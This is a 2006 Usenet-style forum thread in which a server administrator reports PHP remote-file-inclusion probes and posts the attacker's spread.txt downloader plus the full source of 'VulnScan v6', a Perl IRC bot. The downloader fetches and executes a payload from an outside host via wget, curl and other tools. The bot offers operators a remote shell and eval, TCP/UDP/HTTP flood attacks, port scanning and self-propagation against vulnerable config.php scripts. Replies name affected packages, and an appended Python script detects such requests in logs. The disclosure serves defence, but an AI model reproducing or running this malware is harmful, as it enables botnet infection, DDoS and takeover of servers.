PHP/Perl/Unix Virus: delete config.php files asap

Discussion in 'Perl Misc' started by Ignoramus6539, Aug 30, 2006.

  1. There were some strange requests to my server asking for config.php
    file (which I do not have in the requested location).

    I did some investigation. Seems to be a virus written in perl,
    exploiting a vulnerability in php code.

    The requests are like this

    216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"

    File spread.txt contains this:

    <?
    passthru('cd /tmp;wget http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;curl -O http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;lwp-download http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;lynx -source http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;fetch http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
    passthru('cd /tmp;GET http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
    ?>

    That script, obviously, tries very hard to download and execute 'tmr'.

    'tmr' is, apparently, a perl script whose job SEEMS to be to listen on
    IRC channels or some such and spread around by abusing a vulnerability
    in 'config.php'. It is also seemingly used for DDOSing some servers
    and who knows what else (shell function etc).

    If the guy was smart, he's probably run some obfuscator on his code,
    to make it harder to read.

    I did a locate command on my fedora systems and found config.php in
    some package called 'squirrelmail'. Which I immediately deleted, even
    though it was not accessible through the web, just sitting there, but
    I just do not want it.

    My main question is, just what package or program owns config.php that
    is vulnerable. It is a generic file name, so I would not be so quick
    to suspect squirrelmail.

    Here's the 'tmr' script:

    #!/usr/bin/perl

    # VulnScan v6 Stable By Morgan
    #
    # Note:
    # DO NOT REMOVE COPYRIGHTS ...
    # www.priv8.com.ar
    #
    # [Morgan]: http://priv8.com.ar/Zerocool.jpg
    # [Morgan]: u got owned
    # [ZEROCOOL]: bro
    # [ZEROCOOL]: it's a rbot
    # [ZEROCOOL]: i'm not fuckingstupid
    # [ZEROCOOL]: uahuahuahuahua
    #
    #
    # Greets to irc.gigachat.net :: #Morgan
    #
    #
    # To work with auto-spread :
    # Create a file named spread.txt with this :
    #
    # <?
    # passthru('cd /tmp;wget http://priv8.com.ar/v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;curl -O http://priv8.com.ar/v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;lwp-download http://priv8.com.ar/v6;perl v6.txt;rm -f v6*');
    # passthru('cd /tmp;lynx -source http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;fetch http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
    # passthru('cd /tmp;GET http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
    # ?>
    #
    # Change the url .. put ur bot url in that file
    # then use the command :
    #
    # !morgan !eval @cmdstring='http://yoursite.com/spread.txt';
    # or directly change it from the code..
    #
    # Enjoy the bot ....
    # /Morgan


    my $processo = '[sys]';
    use HTTP::Request;
    use LWP::UserAgent;

    #CONFIGURATION
    my $linas_max='4';
    my $sleep='5';
    my @gstring='www.priv8.com.ar';
    my @cmdstring='http://domates.1gig.biz/spread.txt';
    my @adms=("h1dd3n","Tamer");
    my @canais=("#tamerlinux");
    my $nick='Linux-';
    my $ircname ='linux';
    chop (my $realname = `uname -a`);
    $servidor='h1dd3n.pikolata.net' unless $servidor;
    my $porta='6121';
    my $VERSAO = 'Vulnscan v6 www.priv8.com.ar';
    $SIG{'INT'} = 'IGNORE';
    $SIG{'HUP'} = 'IGNORE';
    $SIG{'TERM'} = 'IGNORE';
    $SIG{'CHLD'} = 'IGNORE';
    $SIG{'PS'} = 'IGNORE';
    use IO::Socket;
    use Socket;
    use IO::Select;
    chdir("/");
    $servidor="$ARGV[0]" if $ARGV[0];
    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);


    our %irc_servers;
    our %DCC;
    my $dcc_sel = new IO::Select->new();

    $sel_cliente = IO::Select->new();
    sub sendraw {
    if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
    print $IRC_cur_socket "$_[0]\n";
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);

    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;
    }
    }
    my $line_temp;
    while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
    $sel_cliente->remove($fh);
    $fh->close;
    delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);

    for(my $c=0; $c<= $#lines; $c++) {
    $line = $lines[$c];
    $line=$line_temp.$line if ($line_temp);
    $line_temp='';
    $line =~ s/\r$//;
    unless ($c == $#lines) {
    parse("$line");
    } else {
    if ($#lines == 0) {
    parse("$line");
    } elsif ($lines[$c] =~ /\r$/) {
    parse("$line");
    } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
    parse("$line");
    } else {
    $line_temp = $line;
    }
    }
    }
    }
    }

    sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
    notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
    }
    if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
    if ($onde eq "$meunick"){
    shell("$pn", "$args");
    }
    if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
    my $natrix = $1;
    my $arg = $2;
    if ($arg =~ /^\!(.*)/) {
    ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
    } elsif ($arg =~ /^\@(.*)/) {
    $ondep = $onde;
    $ondep = $pn if $onde eq $meunick;
    bfunc("$ondep","$1");
    } else {
    shell("$onde", "$arg");
    }
    }
    }
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
    if (lc($1) eq lc($meunick)) {
    $meunick=$4;
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
    nick("$meunick|".int rand(999999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
    $meunick = $2;
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
    foreach my $canal (@canais) {
    sendraw("JOIN $canal ddosit");
    }
    }
    }

    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub bfunc {
    my $printl = $_[0];
    my $funcarg = $_[1];
    if (my $pid = fork) {
    waitpid($pid, 0);
    } else {
    if (fork) {
    exit;
    } else {
    if ($funcarg =~ /^portscan (.*)/) {
    my $hostip="$1";
    my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
    my (@aberta, %porta_banner);
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
    foreach my $porta (@portas) {
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
    if ($scansock) {
    push (@aberta, $porta);
    $scansock->close;
    }
    }

    if (@aberta) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
    } else {
    sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
    }
    }
    if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
    my $itime = time;
    my ($cur_time);
    $cur_time = time - $itime;
    while ($3>$cur_time){
    $cur_time = time - $itime;
    &tcpflooder("$1","$2","$3");
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attack done ".$1.":".$2.".");
    }
    if ($funcarg =~ /^version/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
    }
    #SCANNER
    if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
    $boturl=$2;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6]\002 Scan started.");
    srand;
    my $itime = time;
    my ($cur_time);
    my ($exploited);
    $boturl=$2;
    $cur_time = time - $itime;$exploited = 0;
    while($1>$cur_time){
    $cur_time = time - $itime;
    @urls=fetch();
    foreach $url (@urls) {
    $cur_time = time - $itime;
    #sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[v6|Exploiting]\002 ".$url2."\n\n");
    my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
    $url2 ="http://".$path."/".$boturl."@cmdstring?";

    print "\n".$url2."\n\n";


    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan

    my $req=HTTP::Request->new(GET=>$url2);
    my $ua=LWP::UserAgent->new();
    $ua->timeout(10);
    my $response=$ua->request($req);

    if ($response->is_success) {
    if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6|VULN]\002 ".$url2." \n\n");
    }
    }
    else {
    print 'Errore: ',$path,$response->status_line, "\n";
    }
    }
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6]\002 Scan finished in ".$1." seconds.");
    }
    if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP DDoSing]\002 Attacking ".$1.":80 for ".$2." seconds.");
    my $itime = time;
    my ($cur_time);
    $cur_time = time - $itime;
    while ($2>$cur_time){
    $cur_time = time - $itime;
    my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
    print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
    close($socket);
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
    }
    if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP DDoSing]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
    my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
    $dtime = 1 if $dtime == 0;
    my %bytes;
    $bytes{igmp} = $2 * $pacotes{igmp};
    $bytes{icmp} = $2 * $pacotes{icmp};
    $bytes{o} = $2 * $pacotes{o};
    $bytes{udp} = $2 * $pacotes{udp};
    $bytes{tcp} = $2 * $pacotes{tcp};
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
    }
    exit;
    }
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub ircase {
    my ($kem, $printl, $case) = @_;

    if ($case =~ /^join (.*)/) {
    j("$1");
    }
    if ($case =~ /^part (.*)/) {
    p("$1");
    }
    if ($case =~ /^rejoin\s+(.*)/) {
    my $chan = $1;
    if ($chan =~ /^(\d+) (.*)/) {
    for (my $ca = 1; $ca <= $1; $ca++ ) {
    p("$2");
    j("$2");
    }
    } else {
    p("$chan");
    j("$chan");
    }
    }
    if ($case =~ /^op/) {
    op("$printl", "$kem") if $case eq "op";
    my $oarg = substr($case, 3);
    op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^deop/) {
    deop("$printl", "$kem") if $case eq "deop";
    my $oarg = substr($case, 5);
    deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^msg\s+(\S+) (.*)/) {
    msg("$1", "$2");
    }
    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
    for (my $cf = 1; $cf <= $1; $cf++) {
    msg("$2", "$3");
    }
    }
    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
    ctcp("$1", "$2");
    }
    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
    for (my $cf = 1; $cf <= $1; $cf++) {
    ctcp("$2", "$3");
    }
    }
    if ($case =~ /^nick (.*)/) {
    nick("$1");
    }
    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
    conectar("$2", "$1", 6667);
    }
    if ($case =~ /^raw (.*)/) {
    sendraw("$1");
    }
    if ($case =~ /^eval (.*)/) {
    eval "$1";
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub shell {
    my $printl=$_[0];
    my $comando=$_[1];
    if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
    }
    elsif ($pid = fork) {
    waitpid($pid, 0);
    } else {
    if (fork) {
    exit;
    } else {
    my @resp=`$comando 2>&1 3>&1`;
    my $c=0;
    foreach my $linha (@resp) {
    $c++;
    chop $linha;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
    if ($c == "$linas_max") {
    $c=0;
    sleep $sleep;
    }
    }
    exit;
    }
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub tcpflooder {
    my $itime = time;
    my ($cur_time);
    my ($ia,$pa,$proto,$j,$l,$t);
    $ia=inet_aton($_[0]);
    $pa=sockaddr_in($_[1],$ia);
    $ftime=$_[2];
    $proto=getprotobyname('tcp');
    $j=0;$l=0;
    $cur_time = time - $itime;
    while ($l<1000){
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    $t="SOCK$l";
    socket($t,PF_INET,SOCK_STREAM,$proto);
    connect($t,$pa)||$j--;
    $j++;$l++;
    }
    $l=0;
    while ($l<1000){
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    $t="SOCK$l";
    shutdown($t,2);
    $l++;
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan
    sub udpflooder {
    my $iaddr = inet_aton($_[0]);
    my $msg = 'A' x $_[1];
    my $ftime = $_[2];
    my $cp = 0;
    my (%pacotes);
    $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

    socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

    socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
    socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
    socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
    return(undef) if $cp == 4;
    my $itime = time;
    my ($cur_time);
    while ( 1 ) {
    for (my $porta = 1; $porta <= 65000; $porta++) {
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
    send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
    send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
    send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

    for (my $pc = 3; $pc <= 255;$pc++) {
    next if $pc == 6;
    $cur_time = time - $itime;
    last if $cur_time >= $ftime;
    socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
    send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
    }
    }
    last if $cur_time >= $ftime;
    }
    return($cur_time, %pacotes);
    }

    sub ctcp {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
    }
    sub msg {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :$_[1]");
    }
    sub notice {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
    }
    sub op {
    return unless $#_ == 1;
    sendraw("MODE $_[0] +o $_[1]");
    }
    sub deop {
    return unless $#_ == 1;
    sendraw("MODE $_[0] -o $_[1]");
    }
    sub j { &join(@_); }
    sub join {
    return unless $#_ == 0;
    sendraw("JOIN $_[0]");
    }
    sub p { part(@_); }
    sub part {
    sendraw("PART $_[0]");
    }
    sub nick {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
    }
    sub quit {
    sendraw("QUIT :$_[0]");
    }

    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan

    sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);
    {
    my @dominios = ("nodom");
    my @str;

    foreach $dom (@dominios)
    {
    push (@str,"@gstring");
    }

    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";
    my @lst=();
    #sendraw("privmsg #Morgan :DEBUG only test googling: ".$query."");
    my $page = http_query($query);
    while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
    if ($1 !~ m/google|cache|translate/){
    push (@lst,$1);
    }
    }
    return (@lst);
    }

    sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
    local $SIG{ALRM} = sub { die "1";};
    alarm 10;
    my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
    print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
    my @r = <$sock>;
    $page="@r";
    alarm 0;
    close($sock);
    };

    return $page;
    }
    }
    # V6 OWNED YOUR BOX
    # www.priv8.com.ar
    # irc.gigachat.net - #Morgan

    # NOTE: DONT REMOVE COPYRIGHTS
     
    Ignoramus6539, Aug 30, 2006
    #1
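
An added example (not part of the original post, and not code from any participant): a log check for the request shape quoted above, where a query parameter carries an absolute URL. The first sample line is the one from the post; the other two, including the host payload.example.net and the /lists/ path, are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format: ip, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself an absolute URL; group 1 is the host serving it.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://([^/?#:\s]+)', re.I)
SCRIPTED_UA = ("libwww-perl", "lwp-", "wget", "curl")


def find_rfi_attempts(lines):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            remote = REMOTE_RE.match(value)
            if not remote:
                continue
            status = int(m["status"])
            hits.append({
                "client": m["ip"],
                "time": m["ts"],
                "path": path,
                "param": name,
                "payload_host": remote.group(1).lower(),
                # The request in the post ends the injected URL with "?"; record that shape.
                "trailing_qmark": value.endswith("?"),
                "scripted_client": any(s in m["ua"].lower() for s in SCRIPTED_UA),
                # 404: the probed script is absent. 2xx: it exists, so review its code.
                "verdict": "missed" if status == 404 else
                           "review" if 200 <= status < 300 else "other",
            })
    return hits


def payload_hosts(hits):
    """Map each payload host to the sorted script paths probed with it."""
    hosts = {}
    for h in hits:
        hosts.setdefault(h["payload_host"], set()).add(h["path"])
    return {host: sorted(paths) for host, paths in hosts.items()}


SAMPLE_LOG = [
    # Line quoted in the post.
    '216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"',
    # Constructed: percent-encoded variant answered with 200.
    '198.51.100.7 - - [30/Aug/2006:13:30:11 -0500] "GET /lists/config.php?returnpath=http%3A%2F%2Fpayload.example.net%2Fspread.txt%3F HTTP/1.1" 200 1843 "-" "libwww-perl/5.805"',
    # Constructed: ordinary request that must not be flagged.
    '192.0.2.10 - - [30/Aug/2006:13:31:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit["verdict"], hit["client"], hit["path"], hit["payload_host"])
```

Legitimate redirect or callback parameters can also carry absolute URLs, so a hit is a lead to check against the script's source rather than proof of compromise.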

  2. Ignoramus6539 wrote:

    > There were some strange requests to my server asking for config.php
    > file (which I do not have in the requested location).
    >


    Nice one Ignoramus6539

    > I did some investigation. Seems to be a virus written in perl,
    > exploiting a vulnerability in php code.
    >


    Sure looks like it. Is anyone daft enough to include($get_parameter)?

    > I did a locate command on my fedora systems and found config.php in
    > some package called 'squirrelmail'. Which I immediately deleted, even
    > though it was not accessible through the web, just sitting there, but
    > I just do not want it.
    >

    Oooh. "Some package called..." sloppy housekeeping!

    Actually, although Squirrelmail was vulnerable to this kind of attack
    (http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
    http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
    the developers are relatively good about releasing fixes.

    Your attacker seems to be looking for phpListPro
    (http://www.frsirt.com/english/advisories/2006/1325).

    Usually script kiddies don't look to see what you're running before
    unleashing all their dogs on your servers.

    > My main question is, just what package or program owns config.php that
    > is vulnerable. It is a generic file name, so I would not be so quick
    > to suspect squirrelmail.
    >

    Next time try Google first :) and give us a URL for the code.

    C.
     
    Colin McKinnon, Aug 30, 2006
    #2

  3. Colin McKinnon wrote:

    > Ignoramus6539 wrote:
    >

    Whoops - sorry for cross-posting the reply too.

    (rec.crafts.metalworking????)

    C.
     
    Colin McKinnon, Aug 30, 2006
    #3